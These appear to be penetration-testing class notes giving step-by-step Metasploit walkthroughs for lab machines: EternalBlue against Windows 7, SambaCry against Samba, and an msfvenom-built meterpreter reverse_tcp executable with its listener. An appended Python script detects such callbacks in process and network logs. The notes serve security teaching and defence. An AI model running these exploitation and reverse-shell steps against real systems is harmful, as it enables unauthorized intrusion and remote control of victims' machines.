Grade 2 Session 8
=================

Console Based Exploitation 3
    Windows 7 --> Eternal Blue
    Samba Cry --> Eternal Red
Application Based Exploitation
Payload Based Exploitation
Post Exploitation --> Local Privilege Escalation
GUI Based Exploitation --> Armitage

Console Based Exploitation 3
----------------------------

Eternal Blue --> NSA exploit leaked by the Shadow Brokers
EternalBlue - DoublePulsar
dll --> Dynamic Link Library file
DoublePulsar creates a malicious .dll file and EternalBlue executes that malicious .dll file on the target system.
Shadow Brokers ---> Fuzzbunch.py
Empire --> MSF of NSA

Metasploit Module Steps
=======================

Open a terminal
1.  #arp-scan --local
    Target IP Address --> 192.168.228.138
2.  #nmap 192.168.228.138
3.  #nmap -sS -sC -sV 192.168.228.138
4.  #nmap 192.168.228.138 --script vuln
    CVE-2017-0143

Open another terminal, start the Metasploit framework
5.  #msfconsole
6.  #search CVE-2017-0143
7.  #use auxiliary/scanner/smb/smb_ms17_010
8.  #options
9.  #set rhosts 192.168.228.138
10. #options
11. #run
    Host is vulnerable to the exploit
12. #use exploit/windows/smb/ms17_010_eternalblue
13. #show options
14. #set rhost 192.168.228.138
15. #options
16. #exploit
    C:/Windows/System32> --> I got access to the command prompt

For changing the payload:
    set payload windows/meterpreter/reverse_tcp

Samba Cry - Eternal Red
=======================

This is the vulnerability for Linux based OS. SMBv2. NSA exploit leaked by the Shadow Brokers.

Open a terminal
1.  #arp-scan --local
    Target IP Address --> 192.168.228.151
2.  #nmap 192.168.228.151
3.  #nmap -sS -sC -sV 192.168.228.151
4.  #nmap 192.168.228.151 --script vuln

Open another terminal, start the Metasploit framework
5.  #search is_known_pipename
6.  #search cve-2017-7494
    exploit/linux/samba/is_known_pipename
7.  #use exploit/linux/samba/is_known_pipename
8.  #info
9.  #options
10. #set rhost 192.168.228.151
11. #run
    Will give me a raw shell --> Bash shell

Application Based Exploitation
==============================

Open the terminal, start with msfconsole
1.  #msfconsole
2.  #search payload/windows/meterpreter
    payload/windows/meterpreter/reverse_tcp --> use payload/windows/meterpreter_reverse_tcp
    payload/windows/meterpreter/reverse_http
    payload/windows/meterpreter_reverse_tcp

Open another terminal for creating a payload (stub)
3.  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
    -p                                --> selecting the payload
    windows/meterpreter/reverse_tcp   --> is the payload
    lhost                             --> attacker's IP address
    lport                             --> attacker's listening port
    -f                                --> file format
    exe                               --> executable file
    >                                 --> destination of the output
    /root/Desktop/prasheel.exe        --> is the output file

Go back to the first terminal and set up the listening server (handler)
4.  #use exploit/multi/handler
5.  #show options
6.  #set payload windows/meterpreter/reverse_tcp
7.  #show options
8.  #set lport 8989
9.  #set lhost 192.168.0.25
10. #exploit

Armitage --> GUI Based Exploitation
Graphical version of the Metasploit Framework
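A defender-side addition to the Application Based Exploitation section (my example, not part of the session notes): a reverse_tcp stub built with msfvenom connects back to lhost:lport the moment the dropped executable runs, so one detection is to correlate process-creation and network-connection events. The Sysmon-style log lines, trusted paths, port allowlist and 10-second window below are all constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style events (hypothetical sample, not real telemetry).
# EventID=1 is process creation, EventID=3 is a network connection.
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01 EventID=1 ProcessId=4120 Image=C:\\Users\\bob\\Downloads\\invoice.exe",
    "2024-05-01T10:00:02 EventID=3 ProcessId=4120 DestinationIp=192.168.0.25 DestinationPort=8989",
    "2024-05-01T10:00:05 EventID=1 ProcessId=4200 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe",
    "2024-05-01T10:00:06 EventID=3 ProcessId=4200 DestinationIp=93.184.216.34 DestinationPort=443",
    # Same dropped binary calling out again much later: outside the window, so not flagged here.
    "2024-05-01T10:30:00 EventID=3 ProcessId=4120 DestinationIp=192.168.0.25 DestinationPort=8989",
]

# Assumed allowlists: ports a fresh process may legitimately talk to, and
# directories whose binaries are treated as trusted (tune these per environment).
COMMON_PORTS = {22, 25, 53, 80, 139, 443, 445, 587, 993, 995}
TRUSTED_PREFIXES = ("C:\\Windows\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\")
WINDOW = timedelta(seconds=10)

# key=value pairs; values may contain spaces, so stop only before the next " key=".
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Split '<iso timestamp> key=value ...' into a dict with a datetime under 'ts'."""
    ts, rest = line.split(" ", 1)
    event = dict(KV_RE.findall(rest))
    event["ts"] = datetime.fromisoformat(ts)
    return event


def find_suspicious_callbacks(lines):
    """Return (pid, image, dst_ip, dst_port) for connections made within WINDOW of
    process start, from an image outside TRUSTED_PREFIXES, to a port not in COMMON_PORTS."""
    starts = {}  # pid -> (start time, image path)
    hits = []
    for event in map(parse_event, lines):
        pid = event["ProcessId"]
        if event["EventID"] == "1":
            starts[pid] = (event["ts"], event["Image"])
        elif event["EventID"] == "3" and pid in starts:
            started, image = starts[pid]
            port = int(event["DestinationPort"])
            fresh = event["ts"] - started <= WINDOW
            untrusted = not image.startswith(TRUSTED_PREFIXES)
            if fresh and untrusted and port not in COMMON_PORTS:
                hits.append((pid, image, event["DestinationIp"], port))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_callbacks(SAMPLE_EVENTS):
        print("suspicious callback:", hit)
```

Only the dropped invoice.exe connecting to 192.168.0.25:8989 right after start is reported; the browser's HTTPS connection and the late beacon fall outside the rule as written.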